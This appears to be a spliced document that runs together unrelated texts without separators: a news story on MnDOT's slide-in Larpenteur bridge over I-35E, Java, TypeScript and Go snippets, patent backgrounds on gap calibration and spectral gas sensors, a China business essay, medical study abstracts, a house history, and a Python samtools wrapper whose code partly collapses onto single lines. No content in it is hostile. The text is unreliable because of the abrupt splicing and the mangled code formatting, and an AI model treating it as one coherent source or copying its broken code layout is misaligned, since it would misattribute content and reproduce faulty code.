With hydraulic jacks providing the oomph and "concrete shoes" with Teflon pads underneath to give it glide, MnDOT crews will push the new Larpenteur Avenue bridge over I-35E into place during the overnight hours Wednesday into Thursday.

MnDOT will close both directions of I-35E between I-94 and Hwy. 36 from 9 p.m. Wednesday to 5 a.m. Thursday while it uses a technique called Slide-In Bridge Construction (SIBC), something that has been used in a handful of other states and is being tried in Minnesota for the first time.

"It's pretty cool," said spokeswoman Bobbie Dahlke, but it's definitely not fast. It will take up to eight hours to move the 3.5 million-pound deck and beams from the temporary structure nearby where it was built onto the newly constructed piers and abutments. MnDOT will use hydraulic jacks to push the deck laterally at the slow and methodical rate of 19 inches per stroke to cover the distance of 84 feet.

Motorists might experience brief closures of up to 15 minutes at a time overnight Tuesday into Wednesday as MnDOT gets ready for the big move. On Wednesday, lane restrictions in the vicinity of Larpenteur Avenue will begin at 7 p.m., and a number of ramps will shut down at 8 p.m. They include ramps to and from I-35E at Maryland Avenue, Wheelock Pkwy., Roselawn Avenue and Hwy. 36. Motorists will be detoured onto I-694 and I-94 to bypass the closure.

MnDOT built the deck for the new Larpenteur bridge on temporary framework to the north of the previous bridge. That allowed the agency to keep Larpenteur over I-35E open to traffic longer and minimize the length of traffic disruptions. The timeframe from closure of the old bridge to opening of the new one is estimated at 35 days, compared with 60 days for bridges of similar size recently built at Arlington Avenue and Wheelock Pkwy., MnDOT said.

SIBC, also known as accelerated bridge construction, is among the latest innovations states are employing at the suggestion of the Federal Highway Administration, which, through its Every Day Counts program, urges states to use new technologies to shorten project delivery, enhance highway safety and mitigate environmental impacts. SIBC has been tried in Oregon, Utah, Missouri, Colorado and Massachusetts, and other states are now looking at using the method.

SIBC, which allows bridges to be moved laterally only, is different from the method used on the recently built bridges at Arlington Avenue and Wheelock Pkwy. In those cases, the bridges were built off site and moved into place with a Self-Propelled Modular Transporter (SPMT). That process uses a vehicle that jacks up the beams and deck from the staging area and moves the superstructure laterally, vertically and even in a circle if necessary. The parts can be moved hundreds of miles if surface conditions allow for it. MnDOT also used SPMT when building the new Hastings Hwy. 61 bridge. That bridge was built on land, then loaded onto a barge, floated down the Mississippi River and lifted into place.

The new Larpenteur bridge consists of two spans, each 92 feet long. If you don't want to stay up all night to watch the progress, MnDOT says it hopes to capture the event on video and share it on social media.

The new bridge is just part of the ongoing work along I-35E, which will continue through 2015. The project includes adding a new MnPASS lane to the current three lanes between Little Canada Road and Maryland Avenue, rebuilding bridges along that stretch and resurfacing the freeway. Work also continues on rebuilding I-35E between Maryland Avenue and University Avenue.
/**
 * Sweep the next batch for the shard and strategy specified by shardStrategy, with the sweep timestamp sweepTs.
 * After successful deletes, the persisted information about the writes is removed, and progress is updated
 * accordingly.
 *
 * @param shardStrategy shard and strategy to use
 * @param sweepTs sweep timestamp, the upper limit to the start timestamp of writes to sweep
 */
public void sweepNextBatch(ShardAndStrategy shardStrategy, long sweepTs) {
    metrics.updateSweepTimestamp(shardStrategy, sweepTs);
    long lastSweptTs = progress.getLastSweptTimestamp(shardStrategy);

    if (lastSweptTs + 1 >= sweepTs) {
        return;
    }

    log.debug("Beginning iteration of targeted sweep for {}, and sweep timestamp {}. Last previously swept "
                    + "timestamp for this shard and strategy was {}.",
            SafeArg.of("shardStrategy", shardStrategy.toText()),
            SafeArg.of("sweepTs", sweepTs),
            SafeArg.of("lastSweptTs", lastSweptTs));

    SweepBatch sweepBatch = reader.getNextBatchToSweep(shardStrategy, lastSweptTs, sweepTs);
    deleter.sweep(sweepBatch.writes(), Sweeper.of(shardStrategy));

    if (!sweepBatch.isEmpty()) {
        log.debug("Put {} ranged tombstones and swept up to timestamp {} for {}.",
                SafeArg.of("tombstones", sweepBatch.writes().size()),
                SafeArg.of("lastSweptTs", sweepBatch.lastSweptTimestamp()),
                SafeArg.of("shardStrategy", shardStrategy.toText()));
    }

    cleaner.clean(shardStrategy, lastSweptTs, sweepBatch.lastSweptTimestamp(), sweepBatch.dedicatedRows());

    metrics.updateNumberOfTombstones(shardStrategy, sweepBatch.writes().size());
    metrics.updateProgressForShard(shardStrategy, sweepBatch.lastSweptTimestamp());

    if (sweepBatch.isEmpty()) {
        metrics.registerOccurrenceOf(SweepOutcome.NOTHING_TO_SWEEP);
    } else {
        metrics.registerOccurrenceOf(SweepOutcome.SUCCESS);
    }
}
import { expect } from 'earljs'

import { PricesController } from '../../../src/api/controllers/PricesController'
import { AssetId, Exchange } from '../../../src/model'
import { AggregatePriceRepository } from '../../../src/peripherals/database/AggregatePriceRepository'
import { ExchangePriceRepository } from '../../../src/peripherals/database/ExchangePriceRepository'
import { mock } from '../../mock'

describe('PricesController', () => {
  it('returns transformed aggregate prices', async () => {
    const aggregatePriceRepository = mock<AggregatePriceRepository>({
      async getAllByAssetId(assetId) {
        expect(assetId).toEqual(AssetId.DAI)
        return [
          { blockNumber: 1n, priceUsd: 2n },
          { blockNumber: 3n, priceUsd: 4n },
        ]
      },
    })
    const exchangePriceRepository = mock<ExchangePriceRepository>()
    const pricesController = new PricesController(
      exchangePriceRepository,
      aggregatePriceRepository
    )

    expect(await pricesController.getPriceHistory(AssetId.DAI)).toEqual([
      { blockNumber: '1', priceUsd: '2' },
      { blockNumber: '3', priceUsd: '4' },
    ])
  })

  it('returns transformed exchange prices', async () => {
    const aggregatePriceRepository = mock<AggregatePriceRepository>()
    const exchangePriceRepository = mock<ExchangePriceRepository>({
      async getAllByAssetIdAndExchange(assetId, exchange) {
        expect(assetId).toEqual(AssetId.DAI)
        expect(exchange).toEqual(Exchange.uniswapV2('weth'))
        return [
          { blockNumber: 1n, price: 2n, liquidity: 3n },
          { blockNumber: 4n, price: 5n, liquidity: 6n },
        ]
      },
    })
    const pricesController = new PricesController(
      exchangePriceRepository,
      aggregatePriceRepository
    )

    expect(
      await pricesController.getPriceHistoryOnExchange(
        AssetId.DAI,
        Exchange.uniswapV2('weth')
      )
    ).toEqual([
      { blockNumber: '1', price: '2', liquidity: '3' },
      { blockNumber: '4', price: '5', liquidity: '6' },
    ])
  })
})
// ExampleAgentWalks generates an agent in the given world.
// The agent starts off from Node 0. It has 2 addresses that it may
// travel between.
func ExampleAgentWalks(w *world.World) []world.Walk {
	a := world.NewAgent(w).
		WithState(w.Nodes()[0]).
		WithAddress(w.Nodes()[0]).
		WithAddress(w.Nodes()[1]).
		WithVisitDistribution([][]float64{
			[]float64{0.8, 0.2},
			[]float64{0.5, 0.5},
		}).
		WithK(3).
		WithExploreProb(0.35)

	a.Visit(w.Nodes()[2])
	a.Explore()
	a.VisitAddressOrExplore()

	return a.History
}
An electronic device manufacturing system may include one or more process chambers in which substrates are processed to fabricate thereon electronic devices (e.g., integrated circuits and/or flat panel displays). The process chambers may be operated at a vacuum level (ranging, e.g., from about 0.01 Torr to about 80 Torr) and at high temperatures (ranging, e.g., from about 100 degrees C to about 700 degrees C). The same or a different substrate process, such as, e.g., deposition, etching, annealing, curing, or the like of a film layer on a substrate, may take place in each process chamber of the electronic device manufacturing system. Substrate processing may also occur in a loadlock of some electronic device manufacturing systems. A loadlock is a chamber through which substrates are transferred between process chambers and a factory interface for transport elsewhere in an electronic device manufacturing system. In a substrate process, one or more film layers of a desired material having a desired thickness and uniformity may be selectively applied to or removed from a substrate via process delivery apparatus, such as, e.g., a pattern mask and/or a plasma or gas distribution assembly. To ensure that such desired thicknesses and uniformities are precisely applied or removed, the gap between a substrate and the process delivery apparatus should be tightly controlled. However, as the size of process chambers increases to handle larger substrate sizes, larger batch loads of substrates, and higher process temperatures (which may affect the thermal expansion of process components), the desired gap may become more difficult to control. Electronic device manufacturing systems may therefore benefit from improved gap calibration systems and methods.
Bringing best practice to China

As the country merges into the world economy, best practice in China will become best practice globally, products developed in China will become global products, and industrial processes developed in China will become global processes. China is at a turning point, and practices once good enough to support a market entry strategy no longer assure success. Whether a company views China as a manufacturing base, an attractive market, or both, world-class execution will be necessary to succeed, and success in China will be needed to survive not only there but around the globe. As China solidifies its roles as a market, a global manufacturer, and a talent pool, executives will find that they must lead in China to lead in the rest of the world. Unique practices developed to enter the market will no longer suffice in China's increasingly competitive environment, particularly if Chinese operations are held to lower performance standards. Instead, multinationals must lead with their strength: world-class processes honed over many years in established markets and adapted to Chinese realities.
Needs Analysis of English for Medical Purposes: A Student Perspective

English has been integrated into the medical curriculum in higher education in countries where English is not the official language of instruction. For medical students (non-English department students), English has been taught to meet the specified academic and professional needs of learners in so-called English for specific purposes (ESP). To ensure that an English program is relevant to the learners' needs, a needs analysis is required. This study aimed to investigate the English needs of first-year medical students taking a compulsory program of English for academic purposes at the Faculty of Medicine, Sultan Agung Islamic University. The data were collected using a questionnaire to assess the medical students' purposes for learning English, the importance of learning English, language learning needs for the major language skills (reading, writing, listening, speaking) and their preferred type of assessment. The data were descriptively analyzed. Forty-five students, 67% female and 33% male, completed the questionnaire. Most students (76%) used English when studying. All students agreed on the importance of English. The most important subskills included reading technical articles in medicine, listening to audio and to oral presentations, giving spoken presentations, and writing medical prescriptions. Individual achievement was the most preferred type of assessment. The medical students agreed on the importance of English for specific purposes. The interpretation of the findings will be useful for the design of English for specific purposes in the study setting.
The analytical spectral region for measurement of gases, vapors, and volatile materials relevant, for example, to oil, gas, and other applications extends from the ultraviolet (UV) to the mid-infrared (mid-IR) spectral regions. Because of this, many applications rely upon infrared gas analyzers, which continuously measure the real-time concentration of each component in a gas sample containing various gas components by selectively detecting the amounts of infrared radiation absorbed by those components. Infrared gas analyzers are widely used in various fields because of their excellent selectivity and high measuring sensitivity. The non-dispersive infrared (NDIR) technique for the analysis of gases, used for individual species monitoring, is one common approach for an infrared gas analyzer. Traditional NDIR instruments primarily involve mechanical elements, such as filter wheels that are used to select specific filters and position them relative to the optical path between the light source, the sample, and the detector. These commercially available systems are classified as instruments or analyzers. Single-beam and two-beam (double-beam) NDIR gas analyzers are available. With single-beam devices, the infrared radiation generated by the infrared emitter is routed after modulation, such as by a rotating diaphragm wheel, through the measuring vessel containing the gas mixture with the measuring gas component, and on to the detector device. In one example configuration for two-beam devices, the infrared radiation may be subdivided into a modulated measuring radiation passing through the measuring vessel and an inversely-phased modulated comparison radiation passing through a comparison vessel filled with a comparison gas. In such examples, optopneumatic detectors filled with the gas components to be verified, and comprising one or more receiver chambers arranged adjacent to or behind one another, are usually used for the detector device. Such an approach is sometimes referred to as infrared gas filter correlation spectroscopy. Other traditional methods for the analysis of multi-component gases and vapors include Fourier transform infrared (FTIR) spectroscopy and gas chromatography (GC). FTIR spectroscopy relies heavily on measuring the spectra of the key components and then relying on spectral resolution or mathematics to separate and measure the individual contributions from the components. Gas chromatography physically separates the components in the chromatograph, and the separated components are measured directly from the chromatogram by a suitable detection system, such as a flame ionization detection (FID) system. While both of these are standard reference methods, they are expensive and may generate a significant service or operating overhead when implemented in a continuous monitoring system, particularly in the case of GC, which requires the use of high-purity compressed gases. Similarly, mass spectrometry is another method for multi-component gas and/or vapor analysis that works by measuring the mass-to-charge ratio and abundance of gas-phase ions within a high vacuum. This method is also costly and hard to reduce to a scalable sensor that can be used for commercial sensing applications. Other spectroscopy methods used in monitoring fluids include those disclosed in U.S. Pat. No. 7,339,657 to Coates et al., which is incorporated herein by reference.
These examples feature near-infrared light-emitting diodes (LEDs) used for oil condition measurements (soot level) and urea quality. The soot measurement is a simple photometric measurement with one primary wavelength (940 nm), while the urea quality sensor is a true spectral measurement with a three-point determination having two analytical wavelengths, 970 nm and 1050 nm, for water and urea, and one reference/baseline wavelength, 810 nm. In both cases attenuation of signal intensity is used to compute the infrared (near-infrared) absorption, and this is correlated to the concentration of soot (in oil) and the relative concentrations of water and urea in the binary mixture/solution. LED components are available that support an extended spectral region, in the UV down to around 250 nm and in the mid-IR from about 3 to about 5 microns. These devices are currently expensive and do not have a good usable lifetime in the context of low-cost automotive sensors. Both of these LED regions are important for gas and vapor sensing applications. The mid-infrared is an established region for gas and vapor monitoring, primarily of the combustion gases CO and CO2, and to some extent of NOx and other pollutant gases. However, some other NOx gases and other vapors absorb in a UV spectral range that these LEDs cannot adequately reach. Furthermore, existing LED sensing platforms are not reliable for high-temperature gas monitoring, and the implementation relative to the required optics is difficult, if not impossible. While using an NDIR concept as a dedicated sensor is feasible, it is not practical because a long physical optical path is required for IR detection, and the major combustion gas components, such as carbon dioxide (CO2), carbon monoxide (CO) and water, are all infrared absorbers. Water in particular can become a matrix interferent and prevent accurate readings. Additionally, commercial artificial noses may be used to determine the components of a gas or vapor sample. These artificial noses are based on the responses of an array of conductive polymers that are correlated to the smells and odors of gases and vapors. They are expensive devices, are easily contaminated, and are inferential relative to the smell or odor of the vapor. Unlike the spectral nose function of the present invention, these artificial noses have no direct correlation to the actual function of the human nose. There exists a need to provide the same functionality as the instruments and analyzers described above but within a single electronic package, where the source, sample, and detector are reduced to the size of a sensor package. Additionally, there is a need for a sensor that is capable of monitoring a wide spectral band from the UV to the mid-infrared regions. The present invention can be used in a wide variety of industries where gas sensing and monitoring is critical, especially those related to the analysis, safety, and measurement of gases and vapors. The present invention also provides a much broader spectral sensor package for vapors, gases, and other materials that were not previously capable of being monitored in a cost-efficient manner.
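As a rough illustration of the three-point determination described above, the sketch below (Python, with hypothetical intensity values; none of the numbers come from the source) computes near-infrared absorbance from attenuation of signal intensity, with the 810 nm reading serving as the reference/baseline and the 970 nm and 1050 nm readings as the analytical channels:

import math

def absorbance(sample_intensity, reference_intensity):
    """Beer-Lambert absorbance from attenuation of signal intensity:
    A = -log10(I / I0)."""
    return -math.log10(sample_intensity / reference_intensity)

# Hypothetical detector readings mirroring the three-point urea sensor:
# 810 nm as reference/baseline, 970 nm (water) and 1050 nm (urea) as
# analytical wavelengths. Values are illustrative, not from the source.
i0 = 52000.0        # baseline intensity at 810 nm
i_water = 31000.0   # attenuated intensity at 970 nm
i_urea = 42500.0    # attenuated intensity at 1050 nm

a_water = absorbance(i_water, i0)
a_urea = absorbance(i_urea, i0)

# In a calibrated sensor, each absorbance maps (approximately linearly,
# per Beer-Lambert) to the concentration of its component in the
# binary water/urea mixture.
print("A(970 nm)  = %.3f" % a_water)   # ~0.225
print("A(1050 nm) = %.3f" % a_urea)    # ~0.088

The point of the three-point scheme is visible here: the reference channel cancels source drift and fouling common to all wavelengths, so only the analyte-specific attenuation survives the ratio.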
#!/usr/bin/python
#
# Copyright (c) 2012 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""Wrapper around "samtools mpileup | bcftools view", to improve performance
when genotyping sparse regions (e.g. sets of exons / RNAs / or similar), and
allow transparent multi-threading. Alternatively, only "samtools mpileup" may
be called, in order to generate pileups for a set of regions.

There are 3 main motivations for this wrapper:
    1. Current versions of SAMTools read the full contents of the input BAM,
       when a BED file of regions is specified, even if these regions cover
       only a fraction of sites. This can be somewhat mitigated by ALSO
       specifying a region using -r, which fetches just that region, but this
       does not scale well for thousands of individual regions.
    2. It provides transparent parallelization, allowing any set of bed
       regions to be split and processed in parallel.
""" import os import sys import shutil import signal import argparse import traceback import multiprocessing import pysam from pypeline.common.bedtools import \ read_bed_file, \ sort_bed_by_bamfile from pypeline.nodes.samtools import \ samtools_compatible_wbu_mode import pypeline.tools.factory as factory import pypeline.common.procs as processes class BatchError(RuntimeError): pass # Size of smallest block in (linear) BAM index (= 2 << 14) _BAM_BLOCK_SIZE = 16384 ############################################################################### ############################################################################### # CLI functions def build_call(call, args, positional, new_args): call = list(call) args = dict(args) for new_arg in new_args: key, value = new_arg, None if "=" in new_arg: key, value = new_arg.split("=", 1) args[key] = value for (key, value) in sorted(args.iteritems()): call.append(key) if value is not None: call.append(value) call.extend(positional) return call ############################################################################### ############################################################################### # BAM filtering mode import time def filter_bam(bamfile, bedfile): with pysam.Samfile(bamfile) as bam_handle_in: regions = collect_regions(bedfile, bam_handle_in) regions.reverse() write_mode = samtools_compatible_wbu_mode() with pysam.Samfile("-", write_mode, template=bam_handle_in) as bam_handle_out: while regions: region_aend = 0 contig, start, end = regions[-1] for record in bam_handle_in.fetch(contig, start): current_aend = record.aend region_aend = max(region_aend, current_aend) if record.pos > end: last_contig, _, _ = regions.pop() if not regions: break contig, start, end = regions[-1] if (region_aend + _BAM_BLOCK_SIZE < start) \ or (contig != last_contig): break if current_aend >= start: bam_handle_out.write(record) else: # Reached the end of this contig while regions and (regions[-1][0] == contig): regions.pop() return 0 ############################################################################### ############################################################################### # Common functions def cleanup_batch(setup): sys.stderr.write("Cleaning up batch ...\n") for handle in setup["handles"].itervalues(): handle.close() for proc in setup["procs"].itervalues(): if proc.poll() is None: proc.terminate() proc.wait() for filename in setup["temp_files"].itervalues(): sys.stderr.write("Removing temporary file %r\n" % (filename,)) os.remove(filename) def write_bed_file(prefix, regions): fpath = prefix + ".bed" with open(fpath, "w") as bed_handle: for (contig, start, end) in regions: bed_handle.write("%s\t%i\t%i\n" % (contig, start, end)) bed_handle.flush() return fpath def setup_basic_batch(args, regions, prefix, func): setup = {"files": {}, "temp_files": {}, "procs": {}, "handles": {}} try: setup["files"]["bed"] = write_bed_file(prefix, regions) setup["temp_files"]["bed"] = setup["files"]["bed"] filter_builder = factory.new("genotype") filter_builder.set_option("--filter-only") filter_builder.set_option("--bedfile", setup["files"]["bed"]) filter_builder.add_option(args.bamfile) filter_builder.add_option(args.destination) setup["procs"]["filter"] \ = processes.open_proc(filter_builder.call, stdout=processes.PIPE, close_fds=True) setup["handles"]["outfile"] = open(prefix, "w") zip_proc = processes.open_proc(["bgzip"], stdin=func(setup), stdout=setup["handles"]["outfile"], close_fds=True) setup["procs"]["gzip"] = zip_proc return setup except: 
        sys.stderr.write(traceback.format_exc() + "\n")
        cleanup_batch(setup)
        raise


###############################################################################
###############################################################################
# Pileup batch generation

def setup_mpileup_batch(args, regions, prefix):
    def _create_mpileup_proc(setup):
        mpileup_args = {"-l": setup["files"]["bed"]}
        call = build_call(call=("samtools", "mpileup"),
                          args=mpileup_args,
                          new_args=args.mpileup_argument,
                          positional=("-",))

        sys.stderr.write("Running 'samtools mpileup': %s\n"
                         % (" ".join(call)))
        procs = setup["procs"]
        procs["mpileup"] \
            = processes.open_proc(call,
                                  stdin=procs["filter"].stdout,
                                  stdout=processes.PIPE,
                                  close_fds=True)

        return procs["mpileup"].stdout

    return setup_basic_batch(args, regions, prefix, _create_mpileup_proc)


###############################################################################
###############################################################################
# Genotyping batch generation

def setup_genotyping_batch(args, regions, prefix):
    def _create_genotyping_proc(setup):
        mpileup_args = {"-u": None,
                        "-l": setup["files"]["bed"]}
        mpileup_call = build_call(call=("samtools", "mpileup"),
                                  args=mpileup_args,
                                  new_args=args.mpileup_argument,
                                  positional=("-",))

        sys.stderr.write("Running 'samtools mpileup': %s\n"
                         % (" ".join(mpileup_call)))

        procs = setup["procs"]
        procs["mpileup"] \
            = processes.open_proc(mpileup_call,
                                  stdin=procs["filter"].stdout,
                                  stdout=processes.PIPE,
                                  close_fds=True)

        bcftools_call = build_call(call=("bcftools", "view"),
                                   args={},
                                   new_args=args.bcftools_argument,
                                   positional=("-",))

        sys.stderr.write("Running 'bcftools view': %s\n"
                         % (" ".join(bcftools_call)))

        procs["bcftools"] \
            = processes.open_proc(bcftools_call,
                                  stdin=procs["mpileup"].stdout,
                                  stdout=processes.PIPE,
                                  close_fds=True)

        return procs["bcftools"].stdout

    return setup_basic_batch(args, regions, prefix, _create_genotyping_proc)


###############################################################################
###############################################################################

def setup_batch(args, regions, filename):
    """Setup a batch; either a full genotyping, or just a pileup depending on
    'args.pileup_only'; the results are written to 'filename'.
    """
    if args.pileup_only:
        return setup_mpileup_batch(args, regions, filename)
    return setup_genotyping_batch(args, regions, filename)


def run_batch((args, regions, filename)):
    setup = setup_batch(args, regions, filename)
    try:
        if any(processes.join_procs(setup["procs"].values())):
            return None

        return filename
    except:
        # Re-wrap exception with full-traceback; otherwise this information
        # is lost when the exception is retrieved in the main process.
        raise BatchError(traceback.format_exc())
    finally:
        cleanup_batch(setup)


###############################################################################
###############################################################################

def init_worker_thread():
    """Init function for subprocesses created by multiprocessing.Pool: Ensures
    that KeyboardInterrupts only occur in the main process, allowing us to do
    proper cleanup.
""" signal.signal(signal.SIGINT, signal.SIG_IGN) ############################################################################### ############################################################################### def merge_bed_regions(regions): """Takes a sequence of bed regions [(contig, start, end), ...], which is assumed to be sorted by contig and coordiates, and returns a list in which overlapping records are merged into one larger region. """ merged = [] last_contig = last_start = last_end = None for record in regions: if (record.contig != last_contig) or (record.start > last_end): if last_contig is not None: merged.append((last_contig, last_start, last_end)) last_contig = record.contig last_start = record.start last_end = record.end else: last_start = min(last_start or 0, record.start) last_end = max(last_end, record.end) if last_contig is not None: merged.append((last_contig, last_start, last_end)) return merged def create_batches(args, regions): """Yields a sequence of batches that may be passed to the 'run_batch' function; each batch consists of the 'args' object, a set of BED regions, and a destination filename. The set of BED regions is derived by splitting the total set of regions into args.nbatches portions. """ tmpl = "{0}.batch_%03i".format(args.destination) def _get_batch_fname(count): """Returns a filename for batch number 'count'.""" if count: return tmpl % (count,) return args.destination total_size = sum(end - start for (_, start, end) in regions) batch_size = total_size // args.nbatches + 5 batch_count = 0 current_batch = [] current_total = 0 for (contig, start, end) in regions: while (end - start) + current_total > batch_size: new_end = start + batch_size - current_total current_batch.append((contig, start, new_end)) start = new_end yield args, current_batch, _get_batch_fname(batch_count) current_batch = [] current_total = 0 batch_count += 1 current_batch.append((contig, start, end)) current_total += end - start if current_batch: yield args, current_batch, _get_batch_fname(batch_count) def merge_batch_results(filenames_iter): """Takes a multiprocessing.imap iterator yielding filenames of completed batches (gzipped vcf or mpileup files), and writes these into the file-handle out. """ while True: try: # A timeout allows iteruption by the user, which is not the # case otherwise. The value is arbitrary. target_filename = filenames_iter.next(60) # None signals error in subprocess; see 'run_batch' if target_filename is None: return False sys.stderr.write("Merging into file: %r\n" % (target_filename,)) break except multiprocessing.TimeoutError: pass except StopIteration: return with open(target_filename, "r+") as target_handle: while True: try: filename = filenames_iter.next(60) sys.stderr.write(" - Processing batch: %r" % (filename,)) # BGZip is terminated by 28b empty block (cf. ref) # While the standard implies that these should be ignored # if not actually at the end of the file, the tabix tool # stops processing at the first such block it encounters target_handle.seek(-28, 2) with open(filename) as input_handle: shutil.copyfileobj(input_handle, target_handle) os.remove(filename) except multiprocessing.TimeoutError: pass except StopIteration: break return True def collect_regions(bedfile, bam_input_handle): """Returns the regions to be genotyped / pileup'd, as a list of bed-regions in the form (contig, start, end), where start is zero-based, and end is open based. 
""" if bedfile is not None: regions = list(read_bed_file(bedfile)) sort_bed_by_bamfile(bam_input_handle, regions) regions = merge_bed_regions(regions) else: regions = [] for (name, length) in zip(bam_input_handle.references, bam_input_handle.lengths): regions.append((name, 0, length)) return regions def process_batches(args, batches): """Runs a set of batches, and merges the resulting output files if more than one batch is included. """ nbatches = min(args.nbatches, len(batches)) pool = multiprocessing.Pool(nbatches, init_worker_thread) try: batches = pool.imap(run_batch, batches, 1) if not merge_batch_results(batches): pool.terminate() pool.join() return 1 pool.close() pool.join() return 0 except: pool.terminate() pool.join() raise def create_empty_bgz(destination): """Writes an empty BGZip file to the given destination; this file contains a single empty BGZip block (28b). """ with open(destination, "w") as output: # Empty BGZip block output.write("\x1f\x8b\x08\x04\x00\x00\x00\x00\x00\xff\x06\x00\x42") output.write("\x43\x02\x00\x1b\x00\x03\x00\x00\x00\x00\x00\x00\x00") output.write("\x00\x00") def parse_args(argv): parser = argparse.ArgumentParser() parser.add_argument("bamfile", metavar='INPUT', help="Sorted and indexed BAM file.") parser.add_argument("destination", metavar='OUTPUT', help="BGZip compressed VCF or pileup. Also used as " "prefix for temporary files.") parser.add_argument('--bedfile', default=None, help="Optional bedfile, specifying regions to pileup " "or genotype [Default: %(default)s].") parser.add_argument('--mpileup-argument', default=[], action="append", help="Pass argument to 'samtools mpileup'; must be " "used as follows: --mpileup-argument=-argument " "for arguments without values, and " "--mpileup-argument=-argument=value for " "arguments with values.") parser.add_argument('--bcftools-argument', default=[], action="append", help="Pass argument to 'bcftools view'; see the " "--mpileup-argument command description.") parser.add_argument('--pileup-only', default=False, action="store_true", help="Only run 'samtools mpileup', generating a text " "pileup instead of a VCF file [Default: off].") parser.add_argument('--nbatches', metavar="N", default=1, type=int, help="Split the BED into N number of batches, which " "are run in parallel [Default: %(default)s].") parser.add_argument('--overwrite', default=False, action="store_true", help="Overwrite output if it already exists " "[Default: no].") # When set, the --bedfile argument is read and used to filter the BAM # specified for the 'bamfile' parameter; all other parameters are ignored. parser.add_argument('--filter-only', default=False, action="store_true", help=argparse.SUPPRESS) return parser.parse_args(argv) def main(argv): args = parse_args(argv) if args.filter_only: if not args.bedfile: sys.stderr.write("--filter-only requires --bedfile; terminating\n") return 1 return filter_bam(args.bamfile, args.bedfile) if os.path.exists(args.destination) and not args.overwrite: sys.stderr.write("Output already exists; use --overwrite to allow " "overwriting of this file.\n") return 1 with pysam.Samfile(args.bamfile) as bam_input_handle: regions = collect_regions(args.bedfile, bam_input_handle) batches = list(create_batches(args, regions)) if not batches: create_empty_bgz(args.destination) return 0 try: return process_batches(args, batches) except BatchError, error: sys.stderr.write("ERROR while processing BAM:\n") sys.stderr.write(" %s\n" % ("\n ".join(str(error).split("\n"),))) return 1 return 0
Philip M. and Deborah N. Isaacson House

Description and history

The Isaacson House stands in a residential area west of the Bates College campus and north of downtown Lewiston, on the west side of Benson Street. It is a single-story square structure with a flat roof, and is set further back from the street than neighboring houses. A central stone walkway approaches the house, which is set on a terraced rise accessed via floating stone steps. The exterior is finished in vertical siding, and features floor-to-ceiling windows with white trim. At the center of the front facade is a doorway-sized opening leading into a courtyard, which functions as a transitional space between the outside and inside. The main block of the house is divided into a grid of rooms three wide and three deep. Interior finish details include custom millwork and hardware.

The house was built in 1959 for Philip M. Isaacson, a young lawyer and Lewiston native. Isaacson had become interested in modern architecture while studying law at Harvard Law School, and initially approached Josep Lluís Sert with a proposal to design a small year-round house that could be built for $25,000. Sert rejected his proposal, and Isaacson eventually commissioned F. Frederick Bruck, a young architect trained at the Bauhaus-influenced Harvard Graduate School of Design, for the job. The house that Bruck designed ended up costing $32,000; even the smallest details of the interior finishes were included in his design. The house was named one of America's outstanding homes by the American Institute of Architects.
Red cell aggregation induced by a high molecular weight gelatin plasma substitute.

In the course of clinical investigation of a new high molecular weight plasma substitute made of gelatin (MW 60,000), severe side reactions were observed in 2 patients. As the erythrocyte sedimentation rate was markedly raised in both patients after the gelatin infusion, it was thought that these reactions might result from the effect of the gelatin solution on red cell aggregation. The effect of gelatin solutions on red cell aggregation was therefore studied in vitro on human blood and in vivo in dogs, using the erythrocyte sedimentation rate and an optical density method to assess the degree of aggregation. All methods showed that the high molecular weight gelatin fraction induced marked red cell aggregation, and it was concluded that the present gelatin solution cannot be recommended for use in clinical practice.
Cigarette smoking, genetic polymorphisms and colorectal cancer risk: the Fukuoka Colorectal Cancer Study

Background It is uncertain whether smoking is related to colorectal cancer risk. Cytochrome P-450 CYP1A1, glutathione-S-transferase (GST) and NAD(P)H:quinone oxidoreductase 1 (NQO1) are important enzymes in the metabolism of tobacco carcinogens, and functional genetic polymorphisms are known for these enzymes. We investigated the relation of cigarette smoking and related genetic polymorphisms to colorectal cancer risk, with special reference to the interaction between smoking and genetic polymorphism.

Methods We used data from the Fukuoka Colorectal Cancer Study, a population-based case-control study, including 685 cases and 778 controls who gave informed consent to genetic analysis. Interviews were conducted to assess lifestyle factors, and DNA was extracted from buffy coat.

Results In comparison with lifelong nonsmokers, the odds ratios (ORs) of colorectal cancer for <400, 400-799 and ≥800 cigarette-years were 0.65 (95% confidence interval [CI] 0.45-0.89), 1.16 (0.83-1.62) and 1.14 (0.73-1.77), respectively. A decreased risk associated with light smoking was observed only for colon cancer, and rectal cancer showed an increased risk among those with ≥400 cigarette-years (OR 1.60, 95% CI 1.04-2.45). None of the polymorphisms under study was singly associated with colorectal cancer risk. Of the gene-gene interactions studied, the composite genotype of CYP1A1*2A or CYP1A1*2C and GSTT1 polymorphisms was associated with a decreased risk of colorectal cancer, showing a nearly statistically significant (P interaction = 0.06) or statistically significant interaction (P interaction = 0.02). The composite genotypes of these two polymorphisms, however, showed no measurable interaction with cigarette smoking in relation to colorectal cancer risk.

Conclusions Cigarette smoking may be associated with increased risk of rectal cancer, but not of colon cancer. The observed interactions between CYP1A1 and GSTT1 polymorphisms warrant further confirmation.

Background

